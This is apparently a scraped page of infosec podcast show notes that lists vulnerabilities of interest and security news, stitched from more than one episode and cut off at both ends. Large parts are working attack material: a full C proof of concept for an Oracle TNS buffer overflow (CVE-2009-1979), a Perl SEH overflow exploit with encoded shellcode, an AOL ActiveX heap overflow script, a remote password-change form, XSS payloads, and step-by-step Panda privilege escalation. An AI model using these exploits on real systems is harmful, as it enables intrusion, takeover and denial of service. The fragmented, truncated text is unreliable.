“\x27\x28\x4C\x4F\x43\x41\x4C\x3D”
“\x4E\x4F\x29\x27\x29\x29\x00\x4C”
“\x4F\x43\x41\x4C\x20\x53\x45\x52″
“\x56\x45\x52\x00\x68\xC5\x2F\x22″
“\x34\xC5\x2F\x22\x00\x00\x00\x00″
“\x05\x00\x00\x00\x84\xC5\x2F\x22″
“\x04\x00\x00\x00\x00\x00\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00″
“\xFC\xC4\xCC\x07\x6F\x72\x63\x6C”
“\x00\x09\x00\x00\x00\x50\xC5\x2F”
“\x22\x04\x00\x00\x00\x00\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00″
“\x00\x34\xC5\xCC\x07\x6F\x72\x63″
“\x6C\x5F\x58\x50\x54\x00″
)

sockobj.close()
Oracle Network Authentication is subject to a remote buffer-overflow vulnerability. The vulnerability can be exploited over the ‘Oracle Net’ protocol. An attacker doesn’t need specific privileges to exploit this vulnerability. Oracle Database 10g versions 10.1.0.5 and 10.2.0.4. Exploit is available:
#include <winsock2.h>
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <assert.h>

#include <string>

void s_send (SOCKET s, char *msg, DWORD size)
{
int sent;

printf (“s_send: begin: %d bytes\n”, size);

sent=send (s, (char*)msg, size, 0);

if (sent==SOCKET_ERROR)
{
printf (“send() -> SOCKET_ERROR, WSAGetLastError=%d\n”, WSAGetLastError());
} else

if (sent!=size)
printf (“sent only %d bytes\n”, sent);

printf (“s_send: end\n”);
};

void s_recv (SOCKET s)
{
char buf[20000];
int r;

struct timeval t;
fd_set fd;

t.tv_sec=0;
t.tv_usec=100000; // 100 ms

printf (“s_recv: begin\n”);

FD_ZERO(&fd);
FD_SET(s, &fd);

if (select (0, &fd, 0, 0, &t))
// if (select (0, &fd, 0, 0, NULL))
{
r=recv (s, buf, 20000, 0);
if (r!=0 && r!=-1)
{
printf (“got %d bytes\n”, r);
}
else
{
printf (“connection lost, r=%d\n”, r);
};
}
else
{
printf (“select() returns zero\n”);
};
};

unsigned char NSPTCN[]=
{
0×00, 0×00, 0×00, 0×00, 0×01, 0×00, 0×00, 0×00,
0×01, 0x3A, 0×01, 0x2C, 0×00, 0×41, 0×20, 0×00,
0x7F, 0xFF, 0xC6, 0x0E, 0×00, 0×00, 0×01, 0×00,
0×00, 0×00, 0×00, 0x3A, 0×00, 0×00, 0×02, 0×00,
//^^ ^^ cmd len
0×61, 0×61, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00

};

#define NSPTCN_HEADER_LEN 58

unsigned char NSPTDA[]=
{
0×00, 0×00, 0×00, 0×00, 0×06, 0×00, 0×00, 0×00,
// ^^ ^^ packet len
0×00, 0×00
};

#define NSPTDA_HEADER_LEN 10

void s_send_NSPTDA (SOCKET s, char *msg, int size)
{
char * buf;
int sz=size + NSPTDA_HEADER_LEN;

buf=(char*)malloc (sz);

NSPTDA[0]=( sz ) >> 8;
NSPTDA[1]=( sz ) & 0xFF;

memcpy (buf, NSPTDA, NSPTDA_HEADER_LEN);
memcpy (buf + NSPTDA_HEADER_LEN, msg, size);

printf (“s_send_NSPTDA: sending %d bytes…\n”, sz);

s_send (s, (char*)buf, sz);

free (buf);
};

void s_send_TNS_command (SOCKET s, const char *cmd)
{
unsigned char * pkt;
int cmd_len=strlen (cmd);

printf (“sending [%s]\n”, cmd);
printf (“len: %d\n”, cmd_len);

if (cmd_len<231)
{

int str_len=strlen(cmd);
int pkt_len=str_len+58;

pkt=(unsigned char*)malloc (str_len+58);

memcpy (pkt,
“\x00\x00\x00\x00\x01\x00\x00\x00″
// plenH, plenL
“\x01\x3A\x01\x2C\x00\x41\x20\x00″
“\x7F\xFF\xC6\x0E\x00\x00\x01\x00″
“\x00\x00\x00\x3A\x00\x00\x02\x00″
// cmdlenH cmdlenL
“\x61\x61\x00\x00\x00\x00\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00″
“\x00\x00″, 58);

memcpy (pkt+58, cmd, str_len);

pkt[1]=pkt_len&0xFF;
pkt[0]=(pkt_len>>8)&0xFF;

pkt[25]=str_len&0xFF;
pkt[24]=(str_len>>8)&0xFF;

s_send (s, (char*)pkt, pkt_len);

free (pkt);

}
else
{
// something should be modified here in NSPTCN
assert (0);
};
};

bool try_host (char * h)
{
struct hostent *hp;
WSADATA wsaData;
struct sockaddr_in sin;
int r;
struct timeval t;
fd_set fd;
SOCKET s;
char pkt1318[1318];

WSAStartup(MAKEWORD(1, 1), &wsaData);

hp=gethostbyname (h);
assert (hp!=NULL);

s=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);

assert (s!=INVALID_SOCKET);

{
u_long on=1;
assert (ioctlsocket(s, FIONBIO, &on) != -1);
};

sin.sin_family=AF_INET;
sin.sin_port=htons(1521);
memcpy(&sin.sin_addr, hp->h_addr, hp->h_length);

r=connect(s, (struct sockaddr *)&sin, sizeof(sin));

t.tv_sec=3;
t.tv_usec=0;

FD_ZERO(&fd);
FD_SET(s, &fd);

if (select (0, 0, &fd, 0, &t))
{
printf (“connected to %s\n”, h);

s_send_TNS_command (s, “(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))”);

// waiting for NSPTRS

s_recv(s);

s_send_TNS_command (s, “(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))”);

// waiting for NSPTAC

s_recv(s);

// send NA packet

s_send (s,
“\x00\x9C\x00\x00\x06\x00\x00\x00\x00\x00\xDE\xAD\xBE\xEF\x00\x92″
“\x0B\x10\x06\x00\x00\x04\x00\x00\x04\x00\x03\x00\x00\x00\x00\x00″
“\x04\x00\x05\x0B\x10\x06\x00\x00\x08\x00\x01\x00\x00\x0A\xF8\x71″
“\xC2\x6C\xE1\x00\x12\x00\x01\xDE\xAD\xBE\xEF\x00\x03\x00\x00\x00″
“\x04\x00\x04\x00\x01\x00\x01\x00\x02\x00\x01\x00\x03\x00\x00\x00″
“\x00\x00\x04\x00\x05\x0B\x10\x06\x00\x00\x02\x00\x03\xE0\xE1\x00″
“\x02\x00\x06\xFC\xFF\x00\x02\x00\x02\x00\x00\x00\x00\x00\x04\x00″
“\x05\x0B\x10\x06\x00\x00\x0C\x00\x01\x00\x11\x06\x10\x0C\x0F\x0A”
“\x0B\x08\x02\x01\x03\x00\x03\x00\x02\x00\x00\x00\x00\x00\x04\x00″
“\x05\x0B\x10\x06\x00\x00\x03\x00\x01\x00\x03\x01″
,156);

s_recv (s);

// send TTIPRO

s_send (s,

“\x00\x25\x00\x00\x06\x00\x00\x00\x00\x00\x01\x06\x05\x04\x03\x02″
“\x01\x00\x49\x42\x4D\x50\x43\x2F\x57\x49\x4E\x5F\x4E\x54\x2D\x38″
“\x2E\x31\x2E\x30\x00″
, 37);

s_recv (s);

// send TTIDTY

s_send (s,

“\x00\x4B\x00\x00\x06\x00\x00\x00\x00\x00\x02\xB2\x00\xB2\x00\xD2″
“\x25\x06\x01\x01\x01\x0D\x01\x01\x05\x01\x01\x01\x01\x01\x01\x01″
“\x7F\xFF\x03\x09\x03\x03\x01\x00\x7F\x01\x1F\xFF\x01\x03\x01\x01″
“\x3F\x01\x01\x05\x00\x01\x07\x02\x01\x00\x00\x18\x00\x01\x80\x00″
“\x00\x00\x3C\x3C\x3C\x80\x00\x00\x00\xD0\x07″
, 75);

s_recv (s);

// call OSESSKEY

s_send (s,

“\x00\xDA\x00\x00\x06\x00\x00\x00\x00\x00\x03\x76\x02\xFE\xFF\xFF”
“\xFF\x05\x00\x00\x00\x01\x00\x00\x00\xFE\xFF\xFF\xFF\x05\x00\x00″
“\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0D”
“\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41″
“\x4C\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F”
“\x00\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D”
“\x5F\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65″
“\x78\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F”
“\x4D\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B”
“\x47\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08″
“\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00″
“\x09\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00″
“\x00\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06″
“\x64\x65\x6E\x6E\x69\x73\x00\x00\x00\x00″
, 218);

// call OAUTH

memcpy (pkt1318,
“\x05\x26\x00\x00\x06\x00\x00\x00\x00\x00\x03\x73\x03\xFE\xFF\xFF”
“\xFF\x05\x00\x00\x00\x01\x01\x00\x00\xFE\xFF\xFF\xFF\x12\x00\x00″
“\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0C”
“\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x53\x45\x53\x53\x4B\x45\x59″
“\x40\x00\x00\x00\x40\x36\x33\x41\x45\x31\x36\x41\x30\x44\x31\x41″
“\x46\x31\x45\x39\x33\x37\x41\x44\x36\x36\x46\x34\x46\x31\x35\x36″
“\x37\x31\x30\x33\x30\x34\x46\x36\x36\x30\x31\x44\x30\x45\x33\x35″
“\x34\x37\x46\x42\x46\x39\x35\x34\x39\x37\x34\x32\x33\x30\x42\x43″
“\x30\x36\x45\x34\x30\x01\x00\x00\x00\x0D\x00\x00\x00\x0D\x41\x55″
“\x54\x48\x5F\x50\x41\x53\x53\x57\x4F\x52\x44\x40\x00\x00\x00\x40″
“\x36\x31\x37\x35\x31\x42\x45\x35\x34\x37\x31\x30\x44\x45\x41\x46″
“\x38\x46\x42\x33\x34\x32\x45\x36\x32\x41\x45\x35\x30\x45\x44\x38″
“\x45\x43\x38\x30\x39\x33\x31\x44\x33\x44\x45\x34\x42\x33\x41\x37″
“\x34\x35\x38\x37\x45\x36\x46\x32\x36\x46\x37\x45\x45\x30\x34\x34″
“\x00\x00\x00\x00\x08\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x52\x54″
“\x54\x05\x00\x00\x00\x05\x32\x38\x30\x32\x38\x00\x00\x00\x00\x0D”
“\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x43\x4C\x4E\x54\x5F\x4D\x45″
“\x4D\x04\x00\x00\x00\x04\x34\x30\x39\x36\x00\x00\x00\x00\x0D\x00″
“\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41\x4C”
“\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F\x00″
“\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D\x5F”
“\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65\x78″
“\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x4D”
“\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B\x47″
“\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08\x00″
“\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00\x09″
“\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00\x00″
“\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06\x64″
“\x65\x6E\x6E\x69\x73\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45″
“\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x43\x48\x41″
“\x52\x53\x45\x54\x03\x00\x00\x00\x03\x31\x37\x38\x00\x00\x00\x00″
“\x17\x00\x00\x00\x17\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49″
“\x45\x4E\x54\x5F\x4C\x49\x42\x5F\x54\x59\x50\x45\x01\x00\x00\x00″
“\x01\x31\x00\x00\x00\x00\x1A\x00\x00\x00\x1A\x53\x45\x53\x53\x49″
“\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x44\x52\x49\x56\x45\x52″
“\x5F\x4E\x41\x4D\x45\x0E\x00\x00\x00\x0E\x63\x78\x5F\x4F\x72\x61″
“\x63\x6C\x65\x2D\x34\x2E\x34\x20\x00\x00\x00\x00\x16\x00\x00\x00″
“\x16\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F”
“\x56\x45\x52\x53\x49\x4F\x4E\x09\x00\x00\x00\x09\x31\x38\x35\x35″
“\x39\x39\x34\x38\x38\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45″
“\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x4C\x4F\x42″
“\x41\x54\x54\x52\x01\x00\x00\x00\x01\x31\x00\x00\x00\x00\x08\x00″
“\x00\x00\x08\x41\x55\x54\x48\x5F\x41\x43\x4C\x04\x00\x00\x00\x04″
“\x34\x34\x30\x30\x00\x00\x00\x00\x12\x00\x00\x00\x12\x41\x55\x54″
“\x48\x5F\x41\x4C\x54\x45\x52\x5F\x53\x45\x53\x53\x49\x4F\x4E\xE9″
“\x01\x00\x00\xFE\xFF\x41\x4C\x54\x45\x52\x20\x53\x45\x53\x53\x49″
“\x4F\x4E\x20\x53\x45\x54\x20\x4E\x4C\x53\x5F\x4C\x41\x4E\x47\x55″
“\x41\x47\x45\x3D\x20\x27\x41\x4D\x45\x52\x49\x43\x41\x4E\x27\x20″
“\x4E\x4C\x53\x5F\x54\x45\x52\x52\x49\x54\x4F\x52\x59\x3D\x20\x27″
“\x41\x4D\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x43\x55\x52″
“\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x49″
“\x53\x4F\x5F\x43\x55\x52\x52\x45\x4E\x43\x59\x3D\x20\x27\x41\x4D”
“\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x4E\x55\x4D\x45\x52″
“\x49\x43\x5F\x43\x48\x41\x52\x41\x43\x54\x45\x52\x53\x3D\x20\x27″
“\x2E\x2C\x27\x20\x4E\x4C\x53\x5F\x43\x41\x4C\x45\x4E\x44\x41\x52″
“\x3D\x20\x27\x47\x52\x45\x47\x4F\x52\x49\x41\x4E\x27\x20\x4E\x4C”
“\x53\x5F\x44\x41\x54\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27″
“\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x27\x20\x4E\x4C\x53\x5F\x44″
“\x41\x54\x45\x5F\x4C\x41\x4E\x47\x55\x41\x47\x45\x3D\x20\x27\x41″
“\x4D\x45\x52\x49\x43\x41\x4E\x27\x20\x4E\x4C\x53\x5F\x53\x4F\x52″
“\x54\x3D\x20\x27\x42\x49\x4E\x41\x52\x59\x27\x20\x54\x49\x4D\x45″
“\x5F\x5A\x4F\x4E\xEA\x45\x3D\x20\x27\x2B\x30\x33\x3A\x30\x30\x27″
“\x20\x4E\x4C\x53\x5F\x43\x4F\x4D\x50\x3D\x20\x27\x42\x49\x4E\x41″
“\x52\x59\x27\x20\x4E\x4C\x53\x5F\x44\x55\x41\x4C\x5F\x43\x55\x52″
“\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x54″
“\x49\x4D\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27\x48\x48\x2E”
“\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C\x53″
“\x5F\x54\x49\x4D\x45\x53\x54\x41\x4D\x50\x5F\x46\x4F\x52\x4D\x41″
“\x54\x3D\x20\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48″
“\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C”
“\x53\x5F\x54\x49\x4D\x45\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54″
“\x3D\x20\x27\x48\x48\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41″
“\x4D\x20\x54\x5A\x52\x27\x20\x4E\x4C\x53\x5F\x54\x49\x4D\x45\x53″
“\x54\x41\x4D\x50\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20″
“\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48\x2E\x4D\x49″
“\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x20\x54\x5A\x52\x27\x00\x00″
“\x00\x00\x00\x00\x17\x00\x00\x00\x17\x41\x55\x54\x48\x5F\x4C\x4F”
“\x47\x49\x43\x41\x4C\x5F\x53\x45\x53\x53\x49\x4F\x4E\x5F\x49\x44″
“\x20\x00\x00\x00\x20\x35\x44\x46\x34\x37\x43\x45\x35\x42\x38\x42″
“\x32\x34\x43\x46\x38\x42\x46\x42\x36\x46\x30\x46\x36\x39\x32\x42″
“\x38\x46\x42\x39\x38\x00\x00\x00\x00\x10\x00\x00\x00\x10\x41\x55″
“\x54\x48\x5F\x46\x41\x49\x4C\x4F\x56\x45\x52\x5F\x49\x44\x00\x00″
“\x00\x00\x00\x00\x00\x00″
,1318);

pkt1318[0x41]=0×80;

s_send (s, pkt1318, 1318);

assert (closesocket (s)==0);
return true;
}
else
{
printf (“while connect(): select() returns zero\n”);
assert (closesocket (s)==0);
return false;
};
};

void main(int argc, char * argv[])
{

printf (“CVE-2009-1979 PoC. Working at least on 10.2.0.4 win32\n”);
printf (“Vulnerability discovered by Dennis Yurichev <dennis@conus.info> http://blogs.conus.info\n”);
if (argv[1]==NULL)
{
printf (“use: %s <hostname>\n”, argv[0]);
return;
};

try_host (argv[1]);
};
Sun Java System Web Server is subject to a denial-of-service vulnerability. An attacker can exploit this issue to crash the effected application, denying service to legitimate users. Sun Java System Web Server 7.0 Update 6 is affected; other versions may also be vulnerable. Example request is available: ” / HTTP/1.0\n\n”
Panda Security is subject to a local privilege escalation vulnerability. The following versions are affected: Panda Security for Business 4.04.10, Panda Security for Business with Exchange 4.04.10, Panda Security for Enterprise 4.04.10, Panda Internet Security 2010 (15.01.00), Panda Global Protection 2010 (3.01.00), Panda Antivirus Pro 2010 (9.01.00), Panda Antivirus for Netbooks (9.01.00), During installation of Panda Security for Desktops/File Servers the permissions for installation folder: %ProgramFiles%Panda SoftwareAVTC are by default set to Everyone:Full Control. Services are started from this folder and those services are started under LocalSystem account. The 32bit Version of Panda Security for Desktops/File Servers installs the TruePrevent package by default, which protects the files in the installation directory from manipulation.
If the TruePrevent Service (Panda TPSrv) is not running the files are completely unprotected. A normal user is not able to stop the service, but normally he can boot his workstation in SafeBoot mode, in which the TPSrv is not started and all services files can be manipulated. This can be exploited by:
a. Boot the PC in SafeBoot mode, by pressing F8 during the boot process
b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder
c. Copy any application to PAVSRV51.exe
d. Reboot
Upon reboot trojaned application will be executed with LocalSystem account.
Chipmunk News 2.0 is subject to multiple cross site scripting vulnerabilities. This affects the sub, addaddress and searchaddress modules. Google Dork: inurl:admin/login.php “Registering Admin”. Exploit samples are available:
http://localhost/sub.php

POSTDATA: email=<script>alert(‘xss’)</script>&choice=sub&lists=1& amp;submit=submit

http://localhost/admin/addaddress.php

POSTDATA: email=<script>alert(‘xss’)</script>&lists=1&submit=submit

http://localhost/admin/searchaddress.php

POSTDATA: theaddress=<script>alert(‘xss’)</script>&submit=submit

News Items of Interest:

News item 1: http://news.softpedia.com/news/Hundreds-of-Websites-Hosted-at-Network-Solutions-Defaced-132654.shtml

Network Solutions announced that several hundred websites hosted on its infrastructure fell victim in a mass defacement attack during the past several days. Preliminary findings suggest that a remote file inclusion technique was used to compromise several of the company’s Unix servers.

Network Solutions is one of the top five Internet domain name registrars, managing around 6.5 million domains as of January 2009. Apart from its successful domain registration business, the company also offers other services such as Web hosting, ecommerce or online marketing solutions.

News item 2: http://news.bbc.co.uk/2/hi/technology/8470735.stm

Manchester United Football Club has posted a message on its website explaining that its players do not belong to online social networks. It advises users to treat any profiles in the names of its players with “extreme scepticism”. The club says this is because of the high numbers of people impersonating team members online. There are many accounts across social network sites which claim to be in the name of high profile footballers.
News item 3: http://www.symantec.com/about/news/release/article.jsp?prid=20100120_02
Comcast is partnering with Symantec to offer residential and business high-speed Internet subscribers at no-cost Norton Security Suite. The suite includes PC security that protects against viruses, spyware, worms, Trojans, malicious bots, identity theft, as well as a range of customizable parental controls, which help keep children safe online and fosters communication between parents and kids. Comcast subscribers with Macintosh systems will receive Norton Internet Security for Mac.

News item 4: http://support.apple.com/kb/HT4004
Apple has released six patches for Mac OS X and Mac OS X Server, including one for a zero-day flaw that could allow a hacker to hijack a web-browsing session. The zero-day vulnerability, which was made public in November 2009, lies in an authentication gap in TLS (Transport Layer Security) and SSL (Secure Sockets Layer) encryption protocols, Apple said in an advisory on Tuesday.

News item 5: http://www.boston.com/business/technology/articles/2010/01/20/chinas_baidu_sues_us_company_over_hacking/
China’s most popular search engine, Baidu Inc., is accusing its U.S.-based domain name registry of negligence in a lawsuit over a hacking attack that temporarily blocked access to the site last week.

Baidu said Wednesday it has filed suit against Register.com Inc. in a New York court, seeking unspecified damages. Hackers blocked access to Baidu on Jan. 12 by steering traffic to a Web site where a group reportedly calling itself the “Iranian Cyber Army” claimed responsibility. There was no evidence the hackers were linked to Iran.
News item 6: http://www.imperva.com/docs/WP_Consumer_Password_Worst_Practices.pdf
What’s the most common password among the 32 million people who’s accounts were hacked at RockYou late last year? According to a study by Imperva, it’s “123456,” followed by “12345,” “123456789″ and “Password,” in that order. “iloveyou” came in at no. 5. The really depressing thing is that users tend to use the same passwords on all or most of their work and personal accounts. If you want your password to be the stunningly simple “123456″ on RockYou and other social sites, that’s fine. Just don’t use that same password for gmail, your bank and your work accounts.

News item 7: http://nmap.org/download.html
Nmap 5.20 offers more than 150 significant improvements:

30+ new Nmap Scripting Engine scripts
Enhanced performance and reduced memory consumption
Protocol-specific payloads for more effectie UDP scanning
Massive OS and version detection DB updates (10,000+ signatures).

Nmap’s traceroute has been rewritten for better performance. Probes are sent in parallel to individual hosts, not just across all hosts as before. Trace consolidation is more sophisticated, allowing common traces to be identified sooner and fewer probes to be sent.

News item 8: http://www.theregister.co.uk/2010/01/22/tor_security_update/

Users of the Tor anonymiser network have been urged to upgrade their software, following the discovery of a security breach. Two of seven directory authorities and a metrics data server were compromised in a hack discovered earlier this month, Tor developer Roger Dingledine explains. The three servers were taken offline and refurbished following the hack. Fresh identity keys for the two directory authorities hit by the hack were created during the refurbishment process. Users should therefore update to either Tor version 0.2.1.22 or 0.2.2.7-alpha, so that they can use the refurbished servers as conduits for sensitive traffic.
News item 9:http://www.theregister.co.uk/2010/01/22/aurora_exploit_known_months/

Microsoft first knew of the bug used in the infamous Operation Aurora IE exploits as long ago as August, four months before the vulnerability was used in exploits against Google and other hi-tech firms in December, it has emerged. Redmond’s security gnomes finally got around to patching the exploit on Thursday. Microsoft’s advisory accompanying its cumulative update for IE credited Meron Sellem of Israeli firm BugSec for reporting the HTML Object Memory Corruption Vulnerability (CVE-2010-0249), the zero-day vulnerability used in the now infamous attacks.

News item 10: http://ligattsecurity.com/index.php?option=com_content&view=article&id=2261:lsi-offers-boobytrap-a-service-that-detects-who-installed-spyware-on-a-persons-computer&catid=434:ligatt-press-releases

2010
01.21

Episode 51 – USB Tomfoolery

Category: Podcast / Tags: no tag / Add Comment

InfoSec Daily Podcast

InfoSec Podcast Episode 51 for January 21, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

Go online to register by going to the SANS website or call (301) 654-SANS(7267).

SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)

Vulnerabilities of Interest:

Microsoft Windows is subject to a 17-year old local privilege-escalation vulnerability in the #GP trap handler. An attacker can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Exploit code is available.
Sun Java System Web Server is subject to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. Sun Java System Web Server 7.0 Update 7 is affected; other versions may also be vulnerable. Example request is available:
buf = “PUT / HTTP/1.0\n”
buf += “Authorization: Digest ”
buf += “ABCD,”*1000
buf += “\n\n”
The Expat library is subject to a denial-of-service vulnerability because it fails to properly handle crafted XML data. Exploiting this issue allows remote attackers to cause denial-of-service conditions in the context of an application using the vulnerable XML parsing library. Expat 2.0.1 is vulnerable; other versions may also be affected. Exploit code is available.
AOL is subject to an ActiveX Heap Overflow Vulnerability. Version 9.5 impacted, though others may be as well. The vulnerability is in Activex Control (“CDDBControl.dll”) sending a long string to BindToFile() , triggering the vulnerability. Successful exploits allow remote attackers to execute arbitrary code. PoC .wsf script:
<package><job id=’DoneInVBS’ debug=’false’ error=’true’>
<object classid=’clsid:BC8A96C6-3909-11D5-9001-00C04F4C3B9F’ id=’target’
/>
<script language=’vbscript’>
arg1=String(4000, “A”)
arg2=1
target.BindToFile arg1 ,arg2
</script>
</job>
</package>
Al3jeb version 1.3 is subject to remote change password vulnerability. Exploit code is available:
<html>
<head>
<title> al3jeb script Remote Change Password Exploit </title>
</head>
<body text=”#00FF00″ bgcolor=”#000000″>
<form action=http://www.sample.com/al3jeb/Change_Pass.php method=post
style=”text-align: center”>
<b>For More </b>
<p><b>visit us</b></p>
<p>
<a href=”http://sec-war.com/cc/index.php”
style=”text-decoration: none; font-weight: 700″>

http://sec-war.com/cc/index.php</a></p>

<p>
<br>
User: <input
id=”adminn” value=”" />
<br>
Pass: <input
id=”adminp” value=”" />
<br>
Email <input
id=”adminm” value=”" />
<br>
<input
value=”Sec-War” /><br>
<br>
</p>
</form>
</body>
<html>
MP3 Studio v1.X is subject to a (.m3u File) Local Stack Overflow vulnerability. Exploit code is available:
#!/usr/bin/perl

# Exploit Title: MP3 Studio v1.X (.m3u File) Local Stack Overflow
# Date: 19.01.2010 – 01/19/2010
# Author: NeoCortex
# Software Link:

http://www.freewarezoom.com/archives/millennium-mp3-studio

# Version: 1.X
# Tested on: Windows XP SP3 (de-de)

# Original exploit found by HACK4LOVE
# http://www.milw0rm.com/exploits/9277
#
# He wasn’t able to exploit it, so i did it.
# Nice training on seh exploits.
# Good luck finding some buddy using that media player
#
# Greetz to:
# _-Sid-_ – Jess – >Roadkill< – Dawn – MouZe* – Linki
#
# 19.01.2010 by NeoCortex

my $noa = “http://”.”x41″ x 4103; # junk
my $jmp = “xebx1bx90x90″; # 00125D64 EB 1B JMP SHORT 00125D81
my $seh = “x25x12xc8x72″; # 00125D68 72C81225 SE handler
my $nob = “x42″ x 22; # cosmetic…

my $payload =
# payload taken from http://www.metasploit.com
# windows/exec cmd=calc.exe
“xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49″.
“x49x49x49x49x49x49x49x49x49x49x49x51x48x5ax6ax47″.
“x58x30x42x31x50x42x41x6bx42x41x57x42x32x42x41x32″.
“x41x41x30x41x41x58x50x38x42x42x75x78x69x6bx4cx6a”.
“x48x53x74x67x70x67x70x75x50x4ex6bx53x75x65x6cx6e”.
“x6bx51x6cx46x65x70x78x43x31x68x6fx4ex6bx30x4fx54″.
“x58x6ex6bx73x6fx57x50x67x71x58x6bx77x39x4cx4bx64″.
“x74x6cx4bx57x71x5ax4ex76x51x49x50x6ex79x6ex4cx4f”.
“x74x4bx70x70x74x37x77x69x51x48x4ax64x4dx43x31x4f”.
“x32x7ax4bx48x74x55x6bx72x74x34x64x77x74x70x75x4d”.
“x35x6cx4bx71x4fx75x74x36x61x48x6bx41x76x4cx4bx44″.
“x4cx70x4bx4ex6bx63x6fx55x4cx33x31x68x6bx4ex6bx35″.
“x4cx4ex6bx34x41x6ax4bx6cx49x33x6cx35x74x64x44x4a”.
“x63x34x71x4bx70x63x54x6ex6bx71x50x76x50x4fx75x4b”.
“x70x72x58x74x4cx4cx4bx77x30x76x6cx4cx4bx44x30x57″.
“x6cx6cx6dx6ex6bx75x38x54x48x58x6bx73x39x6ex6bx4b”.
“x30x4ex50x37x70x67x70x37x70x6cx4bx62x48x45x6cx63″.
“x6fx35x61x39x66x35x30x50x56x4dx59x48x78x6ex63x59″.
“x50x43x4bx66x30x43x58x68x70x6fx7ax43x34x33x6fx73″.
